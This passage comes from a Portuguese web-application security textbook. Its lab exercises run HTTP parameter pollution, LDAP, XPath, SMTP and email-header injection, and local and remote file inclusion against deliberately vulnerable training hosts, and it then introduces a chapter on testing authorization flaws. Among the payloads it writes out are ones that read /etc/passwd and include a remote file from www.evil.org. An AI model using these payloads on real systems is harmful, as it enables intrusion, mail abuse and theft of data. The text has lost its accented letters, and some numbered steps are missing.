Tal que dd/mm/yyyy e hh:mm:ss representam a data e hora atuais, respectivamente.
16. Desmarque Intercept requests.
17. No Firefox, clique em Retornar pgina de login.
18. Acesse novamente http://logi.esr.rnp.br/logfile e clique no cone Reload current page, caso
a pgina no seja atualizada. O registro foi injetado com sucesso?
Atividade 3 Poluio de parmetros HTTP

Esta atividade visa ilustrar o ataque de poluio de parmetros HTTP, alm das regras de
precedncia que so seguidas, quando parmetros de mesmo nome so submetidos em
uma requisio. Todos os passos devem ser executados na mquina virtual do aluno, e
altamente recomendado que se tente traar a estratgia de explorao, antes de seguir o
roteiro fornecido.
Precedncia em caso de parmetros repetidos

Esta atividade tem o objetivo de verificar a precedncia de parmetros repetidos adotada
por diferentes tecnologias web.
2. Acesse http://hpp.esr.rnp.br/.
3. Digite 123456 para o nmero da enquete e clique em Prosseguir.

4. Observe a URL na barra de endereos.
353
9. Digite a seguinte URL na barra de endereos e pressione [Enter]:
http://hpp.esr.rnp.br/build_poll.php?numero=123456&numero=6789&8
Submit1=Prosseguir
10. Qual dos parmetros foi considerado pela aplicao?
11. Troque a ordem das instncias de numero, na barra de endereos:
http://hpp.esr.rnp.br/build_poll.php?numero=6789&numero=123456&8
Submit1=Prosseguir
12. O resultado foi o esperado da linguagem PHP?
16. Clique em Access Control Flaws no menu do lado esquerdo da tela.
17. Clique em Using an Access Control Matrix.
18. Observe a URL na barra de endereos e anote os valores dos parmetros Screen e Menu.
19. Clique em Bypass a Path Based Access Control Scheme.
20. Observe a URL na barra de endereos e anote os valores dos parmetros Screen e Menu.
21. Digite a seguinte URL na barra de endereos e pressione [Enter]:
http://webgoat.esr.rnp.br:8080/webgoat/attack?Screen=92&Screen=99&8
menu=200
22. Qual das instncias de Screen foi considerada pela aplicao?
23. Digite o seguinte URL na barra de endereos e pressione [Enter]:
http://webgoat.esr.rnp.br:8080/webgoat/attack?Screen=99&Screen=92&8
menu=200
24. O resultado foi o esperado das tecnologias JSP/Tomcat?
25. Digite o seguinte URL na barra de endereos e pressione [Enter]:

http://www.google.com/search?q=escola&q=superior&q=redes
26. Como os parmetros foram tratados neste caso?
354
Poluio de parmetros HTTP
Nesta parte da atividade, o ataque propriamente dito ser exercitado.
1. Acesse http://hpp.esr.rnp.br/.
4. Passe o mouse sobre cada link e veja a URL associada na barra de estado. Que posio o
parmetro poll_id ocupa na query string?
5. Clique em XSS e veja a pgina exibida.
7. Clique em Injeo de SQL e veja a pgina exibida.
9. Clique em CSRF e veja a pgina exibida.
10. Acesse http://hpp.evil.org/.
11. Passe o mouse sobre o link e veja a URL associada na barra de estado. Que parmetro
adicional passado em relao ao Passo 3?
12. Clique em Vote no melhor ataque! e observe que a pgina em hpp.esr.rnp.br acessada.
13. Passe o mouse sobre cada link e veja a URL associada na barra de estado. O que mudou
em relao ao Passo 4?
14. Clique em XSS e veja a pgina exibida.
16. Clique em Injeo de SQL e veja a pgina exibida.
18. Clique em CSRF e veja a pgina exibida.
19. Qual o resultado do ataque?
20. Acesse http://hpp.esr.rnp.br/index2.php.

23. Passe o mouse sobre cada link e veja a URL associada na barra de estado. Que posio o
parmetro poll_id ocupa na query string?
24. Digite o seguinte na barra de endereos e pressione [Enter]:
http://hpp.esr.rnp.br/build_poll2.php?numero=123456%26id%3d3
355
25. Passe o mouse sobre cada link e veja a URL associada na barra de estado. Em que ordem
esto as instncias do parmetro id?
26. Clique em XSS e veja a pgina exibida. O ataque funcionou?
27. Acesse http://hpp.evil.org/index2.php.
28. Passe o mouse sobre o link e veja a URL associada na barra de estado. Qual o propsito
do caractere # no final da URL?
29. Clique em Vote no melhor ataque! e observe que a pgina em hpp.esr.rnp.br acessada.
30. Passe o mouse sobre cada link e veja a URL associada na barra de estado. O que mudou
em relao ao Passo 25?
31. Clique em XSS e veja a pgina exibida. O ataque funcionou?
Atividade 4 Injeo em filtros LDAP

A presente atividade tem por objetivo ilustrar ataques de injeo em filtros LDAP, tecnologia
muito usada em sistemas de gesto de identidades e de controle de acesso.
Todos os passos devem ser executados na mquina virtual do aluno, e altamente

recomendado que se tente traar a estratgia de explorao, antes de seguir o
roteiro fornecido.
Injeo em filtros baseados em operador &

Esta parte da atividade aborda as tcnicas para injeo em filtros baseados em operador
&, quando o servidor permite que tais ataques ocorram.
2. Acesse http://ldap.esr.rnp.br/.
3. Digite esruser e esruser nos campos ID e Senha, respectivamente, e clique em

Buscar Informao.
5. Digite esruser e senha nos campos ID e Senha, respectivamente, e clique em

Buscar Informao.
6. Pelos resultados obtidos nos Passos 3 e 5, que tipo de operador est sendo usado
pelo filtro?
356
8. Fornea esruser( e esruser para os campos ID e Senha, respectivamente, e clique em
Buscar Informao. O que se infere pelo erro exibido?
10. Digite esruser)(&) e s nos campos ID e Senha, respectivamente, e clique em

Buscar Informao.
11. Por que o registro foi exibido, uma vez que a senha informada diferente?
13. Digite *)(uid=root) e s nos campos ID e Senha, respectivamente, e clique em Buscar

Informao. Observe que este ataque pressupe o conhecimento do atributo uid.
14. Qual seria a estrutura geral do filtro usado pela aplicao?
Injeo em filtros baseados em operador |

Neste exerccio, as tcnicas de injeo em filtros baseados em operador | so exploradas.
1. Acesse http://ldap.esr.rnp.br/index2.php.
2. Marque Impressora e clique em Listar dispositivos.
3. Observe a URL exibida no navegador web.
5. Teste vrias combinaes de itens, para observar os resultados e os parmetros utilizados.
6. Digite a seguinte URL na barra de endereos e clique na seta verde:
http://ldap.esr.rnp.br/search2.php?imp=impressora%28&Submit1=Listar+8
dispositivos
7. O que se infere pela mensagem exibida?
8. Digite a seguinte URL na barra de endereos e clique na seta verde:
http://ldap.esr.rnp.br/search2.php?imp=impressora)(%26&Submit1= 8
Listar+dispositivos
9. Explique a razo do ataque funcionar.
10. Qual seria a estrutura geral do filtro usado pela aplicao?
357
Atividade 5 Injeo em filtros LDAP s cegas
Quando o resultado da injeo em filtros LDAP no exibido ao usurio, uma tcnica s cegas
deve ser empregada, para extrao de informao, conforme ser visto nesta atividade. Todos
os passos do roteiro devem ser executados na mquina virtual do aluno, e recomendado
tentar traar a estratgia de explorao antes de seguir as instrues fornecidas.
2. Acesse http://ldap.esr.rnp.br/.
3. Digite esruser e esruser nos campos ID e Senha, respectivamente, e clique em

Buscar Informao.
5. Digite esruser e senha nos campos ID e Senha, respectivamente, e clique em

Buscar Informao.
7. Qual seria a estrutura geral do filtro usado pela aplicao, conforme visto na atividade
anterior?
8. Fornea esruser)(objectClass=user e esruser para os campos ID e Senha, respectiva-

mente, e clique em Buscar Informao.
9. A classe do objeto user?
11. Fornea esruser)(objectClass=account e esruser para os campos ID e Senha, respecti-

vamente, e clique em Buscar Informao.
12. A classe do objeto account?
14. Para descobrir se existe um atributo phone, digite esruser)(phone=* e senha nos
campos ID e Senha, respectivamente, e clique em Buscar Informao. O que se conclui?
16. Realize teste similar ao do Passo 14, para verificar a existncia do atributo gecos.
17. Fixe o valor do campo Senha para esruser e varie o valor de ID, conforme exemplo
abaixo, para descobrir a primeira letra do atributo gecos:
esruser)(gecos=A*
esruser)(gecos=B*
...
esruser)(gecos=a*
...
358
18. Repita o Passo 17, para as demais posies do atributo.
19. Qual o valor do atributo, para o objeto esruser?
20. Na pgina inicial, digite esruser)(homeDirectory=* e esruser nos campos ID e Senha,

respectivamente, e clique em Buscar Informao. O campo existe?
22. Repita o Passo 20, trocando o valor de ID para esruser)(homeDirectory=/home/

esruser. O que acontece?
24. Repita o Passo 20, trocando, agora, o valor de ID para esruser)(homeDirectory=/*.
25. Por que nenhum elemento foi encontrado?
Atividade 6 Injeo de comandos SMTP e de cabealhos de e-mail

Esta atividade visa ilustrar ataques de injeo de comandos SMTP e de cabealhos de e-mail,
que so comuns em pginas que aceitam comentrios e perguntas de usurios do sistema.
Realize todos os exerccios na mquina virtual do aluno e procure descobrir a estratgia de
explorao, antes de seguir o roteiro.
Adulterao de destinatrio
Esta parte da atividade ilustra como explorar uma aplicao que define o destinatrio da
mensagem, com base em um campo controlado pelo usurio.
2. Acesse http://maili.esr.rnp.br/.
3. Pressione Ctrl+U, para visualizar o cdigo HTML.
4. Procure pelo campo realto e veja o valor dele.

~$ ssh supervisor@192.168.213.200
7. Fornea a senha supervisor.
8. Acesse a caixa de correio do usurio supervisor:
~$ mail
9. Abra uma segunda janela de terminal.
~$ ssh outro@192.168.213.200
359
11. Fornea a senha outro.
12. Acesse a caixa de correio do usurio outro:
~$ mail
13. Retorne aplicao e preencha os campos do formulrio, criando uma mensagem com
ttulo Primeira mensagem. Em seguida, clique em Enviar mensagem.
14. Clique em Retornar pgina anterior.
15. Volte ao terminal do usurio supervisor e acesse novamente a caixa de correio:
~$ mail
16. Visualize a mensagem, pressionando 1.
17. Retorne ao Firefox.
18. Clique no menu Tools, seguido de Tamper Data.
19. Na janela que aparece, clique em Start Tamper.
20. Retorne ao formulrio e componha uma mensagem com ttulo Segunda mensagem.
21. Clique em Tamper, na caixa de dilogo que aparece.
22. Altere o parmetro realto para outro%40localhost e clique em OK.
23. No Firefox, clique em Retornar pgina anterior.
24. Na caixa de dilogo que aparece, desmarque Continue Tampering? e clique em Submit.
25. Acesse o terminal do usurio supervisor e pressione h, no prompt do cliente de

e-mail. A mensagem foi enviada para esta caixa de correio?
26. Acesse o terminal do usurio outro e acesse a caixa de correio dele:
~$ mail
27. Pressione 1, para visualizar a mensagem.
Injeo de cabealhos de e-mail

Nesta parte da atividade, o uso do parmetro additional_headers ser explorado, para
enviar a mensagem a destinatrios adicionais.
1. Acesse a janela do Tamper Data e clique em Start Tamper.
2. Retorne janela do Firefox.

3. Crie uma mensagem, com ttulo Terceira mensagem, e clique em Enviar Mensagem.
4. Clique em Tamper, na caixa de dilogo que aparece.
5. Altere o parmetro from para o texto abaixo:
new%40esr.rnp.br%0d%0aCc%3aoutro%40localhost
6. Clique em OK.
7. Clique em Stop Tamper na janela do Tamper Data.
8. Retorne ao Firefox e clique em Retornar pgina anterior.
360
9. Acesse o terminal do usurio supervisor e pressione h.
10. Pressione 2 para ler a mensagem.
11. Acesse o terminal do usurio outro e pressione h.
13. Feche a janela do Tamper Data.
Injeo de comandos SMTP

O objetivo desta parte da atividade fixar os conceitos de injeo de comandos SMTP, por
meio da explorao de uma aplicao que interage diretamente com o servidor de e-mails.
1. Retorne ao Firefox e acesse http://maili.esr.rnp.br/index2.php.
2. Crie uma mensagem com ttulo Quarta mensagem e preencha o corpo dela com o
seguinte texto:
Quarta mensagem.
Este texto sera cortado.
3. Clique em Enviar mensagem.
4. Clique em Retornar mensagem anterior.
6. Pressione 3 para visualizar a mensagem e a observe atentamente. O texto inteiro subme-

tido por meio da aplicao aparece ou foi cortado? Por que isso aconteceu? O que significa?
Retorne ao Firefox e inicie a composio de nova mensagem com ttulo Quinta mensagem
e com o corpo definido abaixo:
Quinta mensagem.
MAIL FROM:<evil@evil.org>
RCPT TO:<outro@localhost>
DATA
From:evil@evil.org
To:outro@localhost
Subject: Mensagem injetada!
Esta mensagem veio de carona!
7. Clique em Enviar mensagem.
361
10. Acesse o terminal do usurio outro e pressione h.
12. Feche as janelas de terminal.
Atividade 7 Injeo de XPath

Esta atividade visa familiarizar o aluno com a linguagem XPath e com os ataques de injeo
nela baseados. Os exerccios fazem referncia ao documento XML ilustrado na Figura 7.18
e devem ser realizados na mquina virtual do aluno. Recomenda-se que se tente traar a
estratgia de explorao, antes de seguir o roteiro disponibilizado.
Introduo linguagem XPath

Nesta atividade, sero realizadas diversas consultas baseadas em XPath.
2. Acesse http://xpathi.esr.rnp.br/ex.php.
3. Verifique o n diretamente sob a raiz, digitando a expresso /*, e clique em Pesquisar.
5. Altere a pesquisa para /child::* e clique em Pesquisar. O que muda?
7. Fornea a expresso /users/* e clique em Pesquisar. Houve alguma alterao no resul-

tado? Explique.
9. Digite /user e clique em Pesquisar. Por que a consulta no devolveu resultados?
11. Altere a expresso para //user e clique em Pesquisar. Por que agora foram listados ns?
13. Digite //user/name e clique em Pesquisar. Que outra expresso retornaria o mesmo
resultado?
15. Fornea //user[position()=3]/name e clique em Pesquisar.
17. Digite count(//name) e clique em Pesquisar.
362
19. Digite //user[position()<=3]/name e clique em Pesquisar.
Injeo de XPath
Esta parte do exerccio aborda o ataque de injeo de XPath.
20. Acesse http://xpathi.esr.rnp.br/.
21. Fornea esruser e esruser para os campos ID e Senha, respectivamente, e clique em

Buscar informao.
23. Repita o Passo 21, mas fornecendo senha para o campo Senha.
25. Digite ] e ] nos campos ID e Senha, respectivamente, e clique em Buscar informao.

Algum erro aconteceu?
27. Fornea or true() or e senha para os campos ID e Senha, respectivamente, e clique

em Buscar informao. O que aconteceu?
29. Repita o Passo 27, mas fornecendo or position()=2 or para o campo ID.
31. Repita o Passo 29, mas alterando o valor de position(), at que nenhum valor seja encontrado.
Atividade 8 Injeo de XPath s cegas

Dando continuidade atividade anterior, esta atividade ilustrar a verso s cegas do
ataque de injeo de XPath.
2. Acesse http://bxpathi.esr.rnp.br/.
3. Digite Campinas no campo Cidade e clique em Contar. Quantos usurios existem?

5. Digite Brasilia no campo Cidade e clique em Contar. Quantos usurios existem?
7. Fornea Campinas and a=a para o campo Cidade e clique em Contar. Quantos usu-
rios foram localizados? Por que isso aconteceu?
363
9. Fornea Campinas and true() and a=a para o campo Cidade e clique em Contar.
O resultado obtido corresponde ao esperado?
11. Descubra o tamanho do nome do n de contexto, fornecendo o texto abaixo com valores
numricos crescentes para a posio marcada em vermelho:
Campinas and string-length(name(.))=1 and a=a
12. Qual o tamanho encontrado?
13. Encontre a primeira letra do nome do n de contexto, fornecendo o texto abaixo com
diferentes letras minsculas na posio marcada em vermelho:
Campinas and substring(name(.),1,1)=a and a=a
14. Qual o valor da primeira letra?
16. Repita o Passo 13, variando o primeiro argumento numrico de 2 a 4, para achar o valor
das demais letras. Qual o nome do n de contexto?
17. Verifique se o n possui atributos, fornecendo o texto abaixo, com valores nmericos
crescentes para a posio marcada em vermelho:
Campinas and count(attribute::*)=0 and a=a
18. Quantos atributos existem para o n de contexto?
19. Descubra o tamanho do nome do atributo, fornecendo o texto abaixo, com valores
numricos crescentes para a posio marcada em vermelho:
Campinas and string-length(name(attribute::*))=0 and a=a
20. Qual o tamanho do nome do atributo?

Atividade 9 Incluso de arquivos

A presente atividade tem por objetivo ilustrar ataques de incluso de arquivos locais e
remotos, em tempo de execuo. O roteiro fornecido deve ser seguido, empregando-se a
mquina virtual de aluno.
2. Acesse http://filei.esr.rnp.br/.
364
3. Selecione Brasil e clique em Prosseguir.
4. Observe a URL exibida na barra de endereos.
6. Selecione Estados Unidos e clique em Prosseguir. O que mudou em relao URL vista
no Passo 4?
7. Digite a seguinte URL na barra de endereos e clique no boto verde:
http://filei.esr.rnp.br/select.php?country=%2Fetc%2Fpasswd&Submit1= 8
Prosseguir
8. O que aconteceu? Por que nada foi exibido?
9. Suponha que existe um arquivo evil.php, gravado maliciosamente no servidor. Digite a

seguinte URL na barra de endereos e clique no boto verde, para inclui-lo:
http://filei.esr.rnp.br/select.php?country=evil&Submit1=Prosseguir
10. O ataque foi bem-sucedido?
11. Repita o Passo 9, mas fornecendo a URL a seguir:
http://filei.esr.rnp.br/select.php?country=select&Submit1=Prosseguir
12. O que contm a pgina de resposta? Qual a provvel razo do resultado obtido?
http://filei.esr.rnp.br/select.php?country=http%3A%2F%2Fwww.evil.org8
%2Fevil&Submit1=Prosseguir
14. Que arquivo remoto foi includo?
15. Acesse http://filei.esr.rnp.br/index2.php.
16. Selecione Brasil e clique em Prosseguir.
17. Observe a URL exibida na barra de endereos e diga o que mudou em relao ao incio
da atividade.
http://filei.esr.rnp.br/select2.php?country=%2Fetc%2Fpasswd&Submit1= 8
Prosseguir
365
19. Repita o Passo 18, mas fornecendo a seguinte URL:
http://filei.esr.rnp.br/select2.php?country=http%3A%2F%2Fwww.evil. 8
org%2Fevil.php&Submit1=Prosseguir

366
Bibliografia 7
1 ALONSO, Chema; BORDN, Rodolfo; GUZMN, Antonio e BELTRN, Marta. LDAP Injection
& Blind LDAP Injection in Web Applications. Black Hat Europe 08, 2008.
1 BALDUZZI, Marco embyte. HTTP Parameter Pollution Vulnerabilities in Web Applications.

Black Hat Europe, 2011.
1 BALDUZZI, Marco; GIMENEZ, Carmen Torrano; BALZAROTTI, Davide e KIRDA, Engin. HTTP
Parameter Pollution Vulnerabilities in Web Applications. In: Proceedings of the Network
and Distributed System Security Symposium, NDSS 2011, The Internet Society, 2011.
1 BAROR, Yuval; YOGEV, Ayal e SHARABANI, Adi. Flash Parameter Injection A Security
Advisory. Whitepaper, IBM Rational Application Security Team, 2008.
1 BERGLUND, Anders; BOAG, Scott; CHAMBERLIN, Don; FERNNDEZ, Mary F.; KAY, Michael;
ROBIE, Jonathan e SIMON, Jrme. XML Path Language (XPath) 2.0 (Second Edition), W3C
Recommendation, dezembro de 2010.
1 BURSZTEIN, Elie; GOURDIN, Baptiste; RYDSTEDT, Gustav e BONEH, Dan. Bad Memories.
Black Hat USA, 2010.
1 CARETTONI, Luca e DI PAOLA, Stefano. HTTP Parameter Pollution. OWASP EU09 Poland,
The OWASP Foundation, 2009.
1 CLARK, James e DEROSE, Steve. XML Path Language (XPath) Version 1.0, W3C
Recommendation, novembro de 1999.
1 DANIEL, Chrysostomos. HTTP Parameter Pollution. White Paper, Acunetix, 2012.

1 DI PAOLA, Stefano e DABIRSIAGHI, Arshan. Expression Language Injection, White Paper, 2011.
1 DAZ, Vicente Aguilera. MX Injection Capturing and Exploiting Hidden Mail Servers. White
Paper, Internet Security Auditors, 2006.
1 FAUST, Sacha. LDAP Injection Are your web applications vulnerable? White Paper, SPI
Dynamics, Inc., 2003.
1 FORBES, Thomas e SIDDHARTH, Sumit. Hacking XPath 2.0. Black Hat Europe, 2012.
1 GRZELAK, Daniel. Log Injection Attack and Defence. SIFT Special Publication, SIFT
Information Security Services, 2007.
1 GUILLARDOY, Esteban, DE GUZMAN, Facundo e ABBAMONTE, Hernan. LDAP Injection

Attack and Defense Techniques. White Paper, Ridabeo Hack Lab, 2010a.
1 GUILLARDOY, Esteban, DE GUZMAN, Facundo e ABBAMONTE, Hernan. LDAP Injection

Attack and Defense Techniques. Em HITB Magazine, Volume 1, Issue 1, 2010b.
1 HOWARD, Michael, LEBLANC, David e VIEGA, John. 19 Deadly Sins of Software Security
1 JOURDAN, Guy-Vincent. Securing Large Applications Against Command Injections. Em

Aerospace and Electronic Systems Magazine, Volume 24, Issue 6, Pg. 15-24, IEEE, 2009.
1 KLEIN, Amit. Divide and Conquer HTTP Response Splitting, Web Cache Poisoning Attacks,
and Related Topics. White Paper, Sanctum, 2004a.
1 KLEIN, Amit. Blind XPath Injection. White Paper, Sanctum, 2004b.

1 KLEIN, Amit. Blind XPath Injection. White Paper, Watchfire, 2005.
367
1 LARANJEIRO, Nuno, VIEIRA, Marco e MADEIRA, Henrique. Protecting Database Centric Web
Services against SQL/XPath Injection Attacks. Em Database and Expert Systems Applications,
20 th International Conference, DEXA 2009, Linz, Austria, 31 de agosto 4 de setembro,
2009. Proceedings. Lecture Notes in Computer Science 5690, Springer, 2009.

1 MITROPOULOS, Dimistris, KARAKOIDAS, Vassilios e SPINELLIS, Diomidis. Fortifying
Applications Against Xpath Injection Attacks. Em The 4th Mediterranean Conference on
Information Systems, MCIS 2009, 2009.
1 PINTER, Dominik. Kentico CMS Security White Paper. Kentico Software s.r.o., 2011.
1 SMITH, Mark e HOWES, Tim. RFC 4515: Lightweight Directory Access Protocol (LDAP): String
Representation of Search Filters, 2006.
1 SU, Zhendong e WASSERMANN, Gary. The Essence of Command Injection Attacks in

Web Applications. Em POPL 06 Conference record of the 33rd ACM SIGPLAN-SIGACT
Symposium on Principles of Programming Languages, ACM, 2006.
1 VAN DER VLIST, Eric. XQuery Injection Easy to exploit, easy to prevent.... Em XML Prague
2011 Conference Proceedings, p. 177-189, 2011.
1 ZEILENGA, Kurt. RFC 4514: Lightweight Directory Access Protocol (LDAP): String Representation
of Distinguished Names, 2006a.
1 ZEILENGA, Kurt. RFC 4512: Lightweight Directory Access Protocol (LDAP): Directory Information
Models, 2006b.
368
8
Teste do mecanismo de
autorizao e da lgica de negcio
objetivos
Apresentar vulnerabilidades no mecanismo de autorizao e na lgica de negcio

e mostrar os mtodos que podem ser empregados para detect-las e explor-las.
conceitos
Autorizao, acesso direto a recursos, percurso de caminho, redirecionamento
no validado, condies de corrida, vulnerabilidades em lgica de negcio.
Introduo
Um dos objetivos de se autenticar um usurio no sistema consiste em fornecer meios de q
negar ou autorizar operaes que ele deseja realizar, de acordo com os privilgios que
possui, alm de permitir o rastreamento do que feito na aplicao.
Essa verificao deve ser sempre executada, por um componente chamado de monitor
de referncias (Anderson, 1972), no momento em que uma ao iniciada, o qual deve
possuir as seguintes caractersticas, para atender os requisitos que se prope satisfazer:
Captulo 8 - Teste do mecanismo de autorizao e da lgica de negcio

1 Ser inviolvel.
1 Ser invocado em todo e qualquer acesso a um recurso.
1 Ser suficientemente pequeno para que possa ser analisado e ter sua correo comprovada.
Obviamente, muito difcil atingir o primeiro e o terceiro objetivos, principalmente, quando

se espera uma prova de segurana do componente. Por mais que ele seja desenvolvido,
por meio de um ciclo que considera segurana em todas as etapas, erros sempre podem
ocorrer, causando a introduo de vulnerabilidades.
Um problema mais grave, entretanto, resume-se em ignorar o segundo item da lista, o q

que acontece frequentemente em aplicaes reais.
A lista de problemas, neste caso, compreende desde verificar os privilgios uma nica vez,
logo aps a autenticao, at deixar de validar de vez a legitimidade dos acessos. Note-se
que, em qualquer das situaes, um usurio malicioso consegue executar operaes as
quais no deveria.
369
A maneira como o monitor de referncias libera ou bloqueia uma dada ao deter- q
minada pelo modelo de controle de acesso adotado, que um arcabouo responsvel
por definir quais recursos podem ser acessados pelas diversas entidades do sistema.
Existem trs tipos desses modelos:
1 Controle de acesso discricionrio (DAC): o proprietrio de cada objeto determina

quem tem o direito de acess-lo e quais operaes podem ser realizadas, por meio de
listas de controle de acesso atreladas a cada recurso.
1 Controle de acesso mandatrio (MAC): todos os recursos e entidades do sistema

recebem um rtulo contendo uma classificao e uma categoria, que determinam,
respectivamente, nveis hierrquicos de sensibilidade e necessidade de acessar e
conhecer os recursos. Por exemplo, cada informao do ambiente pode ser classi-
ficada como livre, restrita ou secreta e categorizada por projeto. Para ter o acesso
autorizado, uma entidade deve, ento, ter um nvel de sensibilidade maior ou igual
que o do objeto e fazer parte do projeto em que ele est rotulado.
1 Controle de acesso baseado em papis (RBAC): nesse modelo, cada usurio

associado a um ou mais papis, os quais espelham as diversas funes que podem
ser desempenhadas no ambiente. Privilgios sobre objetos e para realizar aes so
concedidos somente a papis, sempre de acordo com o mnimo necessrio para a
execuo da funo. Isso facilita a gesto de usurios, em cenrios de alta rotativi-
dade, pois no necessrio alterar, periodicamente, as listas de controle de acesso
dos diversos recursos, como aconteceria no modelo DAC.
Ataques contra o mecanismo de autorizao podem ser horizontais ou verticais, depen-

dendo do tipo de privilgio que necessrio obter (Stuttard e Pinto, 2007).
No primeiro caso, o objetivo consiste em acessar recursos pertencentes a outros usurios,

como a caixa de correio eletrnico alheia, por exemplo. No ltimo, o foco resume-se em con-
seguir um perfil mais privilegiado que o atribudo, como o de um administrador do sistema,
que capaz de executar qualquer operao e acessar qualquer objeto.
O mecanismo de autorizao, juntamente com o de autenticao e de auditoria, constitui

o mdulo de controle de acesso da aplicao, que fundamental para a segurana do
sistema, mas torna-se intil quando outras vulnerabilidades, como as vistas at aqui, afetam
o ambiente. Alm dessas, uma classe especial de defeitos de segurana, que ser abordada
neste captulo e afeta a lgica de negcio, tem forte impacto no arcabouo de controle de
acesso como um todo, pois resulta, comumente, em operaes no permitidas ou inespe-
radas sendo realizadas.
Vulnerabilidades na lgica de negcio de uma aplicao nunca so encontradas por ferra-

mentas automatizadas e, muitas vezes, passam despercebidas em um teste de invaso, princi-
palmente, se for do tipo caixa preta. Um motivo para isso que cada ocorrncia desse tipo de
problema praticamente nica, afetando um aspecto totalmente especfico de um sistema.

A aplicao de leilo ilustrada no Captulo 3, que permitia bloquear os concorrentes, um
exemplo desse tipo de defeito. Outro caso que pode ser citado compreende um processo de
mltiplos estgios que ignora se os anteriores foram devidamente completados.
O restante deste captulo est organizado da seguinte maneira: em primeiro lugar, so

cobertos ataques de acesso direto a recursos, como pginas e outros objetos; em seguida,
as tcnicas para violao de controles no lado cliente so discutidas; depois disso, so apre-
sentados os defeitos que permitem percurso de caminho, redirecionamento para outros
domnios e os que resultam em condies de corrida; por fim, vulnerabilidades na lgica de
negcio so abordadas, com a anlise de alguns exemplos reais.
370
Vulnerabilidades em aplicaes web
Voc se recorda de alguma aplicao web cuja URL apresentasse valores que pudessem ser
chaves primrias de tabelas ou recursos internos?
Acesso direto a recursos

Muitas aplicaes web no respeitam o requisito de um monitor de referncias de que q
seja invocado em toda tentativa de acesso. Em vez disso, a verificao de privilgios
realizada em momento anterior, o que permite que o mecanismo de controle de acesso
do sistema seja violado.
Nesta seo sero apresentadas algumas variaes do ataque, as quais dependem do tipo de
recurso sendo controlado e das premissas incorretas assumidas pelo time de desenvolvimento.
Acesso direto a pginas

Uma implementao muito comum de controle de acesso encontrada em aplicaes q
reais adota segurana por obscuridade, assumindo que um usurio no capaz de
requisitar determinado recurso, por desconhecer que ele existe.
O fluxo de execuo, nesses casos, envolve, em primeiro lugar, realizar a autenticao

do usurio. Caso isso seja bem sucedido, a aplicao verifica que aes ele pode solicitar
e cria itens de menu ou links, somente para as pginas que processam tais operaes.
Posteriormente, quando o usurio solicita que algo seja realizado, nada mais verifi-
cado pelo mecanismo de controle de acesso, e, portanto, a ao liberada diretamente.
Figura 8.1 Assim, basta efetuar uma requisio para qualquer URL vlida do sistema, para se con-
Aplicao com segu-
rana por obscuri- seguir um acesso sem a devida autorizao.
dade: (a) Operaes Para exemplificar esse cenrio, a Figura 8.1 ilustra as telas exibidas por uma aplicao para
disponibilizadas

para um visitante. dois usurios com perfis de acesso distintos.
(b) Operaes dis-
ponibilizadas para o
administrador
do sistema.
(a) (b)
H diversas recursos que um usurio malicioso pode emprega, para descobrir as URLs das
operaes s quais no tem acesso: registros de trilhas de auditoria, histrico de navegao,
trfego capturado, documentao da aplicao, interao com outros usurios do sistema,
inferncia a partir da estrutura geral das URLs usadas nos links disponveis, dentre inmeras
outras possibilidades. A partir desses exemplos, fica claro que essa abordagem de controle
371
de acesso completamente insegura, pois parte de uma premissa incorreta, com relao
incapacidade do usurio de descobrir o que no apresentado pela interface.
Para verificar se uma aplicao vulnervel a este ataque, o seguinte roteiro pode ser utilizado:
1. Se diversas contas de usurio, com diferentes perfis, estiverem disponveis para o teste:
1.1.Autentique-se na aplicao com cada uma das contas e percorra as diversas pginas
que a compem.
1.2.Anote todas as funcionalidades diferentes e as URLs correspondentes que aparecem

para cada uma das contas.
1.3.Com cada conta, tente acessar as funcionalidades disponveis somente para outros
usurios.
1.4.Se o acesso for permitido, o controle de acesso da aplicao vulnervel.
2. Se no, se somente uma conta estiver disponvel para o teste:
2.1.Autentique-se na aplicao e percorra as diversas pginas que a compem.
2.2.Anote todas as URLs das diversas funcionalidades apresentadas.
2.3.Verifique se h algum padro que pode ser identificado nas URLs.
2.4.Gere novas URLs, de acordo com o passo anterior, e tente acess-las.
Uso do cabealho HTTP Referer

O cabealho HTTP Referer (que deveria ser escrito Referrer) permite que clientes indiquem q
para o servidor o endereo do recurso, a partir do qual a requisio est sendo realizada.
Isso possibilita, por exemplo, criar links para retornar pgina visitada anteriormente e
gerar estatsticas de onde o acesso se inicia. Enquanto esses so usos vlidos do cabe-
alho, algumas aplicaes o utilizam inadvertidamente com fins de segurana.
A ideia justamente impedir acesso direto a recursos, obrigando que a requisio tenha
origem em uma pgina na qual, necessariamente, o usurio tenha passado pelo pro-
cesso de autenticao. Contudo, a estratgia adota a premissa invlida de que o usurio
no capaz de definir o Referer como bem desejar.
Para ilustrar o problema, considere-se o seguinte trecho de cdigo em PHP, presente no

script responsvel por gerar o menu da interface administrativa da aplicao:
if (!isset($_SERVER[HTTP_REFERER]) ||
stripos($_SERVER[HTTP_REFERER], http://bssac.esr.rnp.br/
admin/)
=== false) {
echo(<h2>Origem não permitida!!!</h2><br>);
echo(<a href=http://bssac.esr.rnp.br/admin/>Retornar à
página de login</a>);
goto invalid_referer;
372
O propsito do if acima verificar se o valor do cabealho REFERER contm a URL passada
como argumento para a funo stripos(). Em caso negativo, uma mensagem de erro
exibida e o controle desviado para a seo de cdigo rotulada por invalid_referer.
Um usurio malicioso, para quebrar esse mecanismo de proteo, pode interceptar a requi-
sio e inserir o cabealho Referer com o valor adequado, conforme ilustrado na Figura 8.2.
Figura 8.2 O teste para examinar se uma aplicao apresenta essa vulnerabilidade contm os passos
Adio de descritos abaixo:
cabealho Referer.
1. Para cada uma das URLs identificadas na fase de mapeamento:
1.1.Digite-a na barra de endereos do navegador web e faa a requisio.
1.2.Se a aplicao exibir uma mensagem indicando que a origem da requisio no vlida:
1.2.1. Faa nova submisso, mas incluindo o cabealho Referer definido para a URL

da pgina, a partir da qual o recurso carregado, no fluxo normal de uso.
1.2.2. Se a pgina for carregada, a aplicao emprega o cabealho Referer para con-
trolar o acesso e , portanto, vulnervel.
Acesso direto a objetos

Enquanto o acesso direto a pginas da aplicao constitui um ataque vertical, no qual se
busca mais privilgios, o acesso direto a objetos compreende um ataque horizontal, pois o
usurio j tem permisso para usar a funcionalidade, mas deseja manipular objetos alheios.
O problema acontece quando a aplicao expe ao usurio os identificadores internos q

dos recursos, como chaves primrias de tabelas, por exemplo. Supondo que o pro-
cesso de autorizao no ocorra imediatamente antes da operao, um usurio mal
intencionado, por meio da adulterao de parmetros, consegue alterar o valor da
chave utilizada para buscar o recurso e, assim, acessar um elemento arbitrrio, perten-
cente outra pessoa.
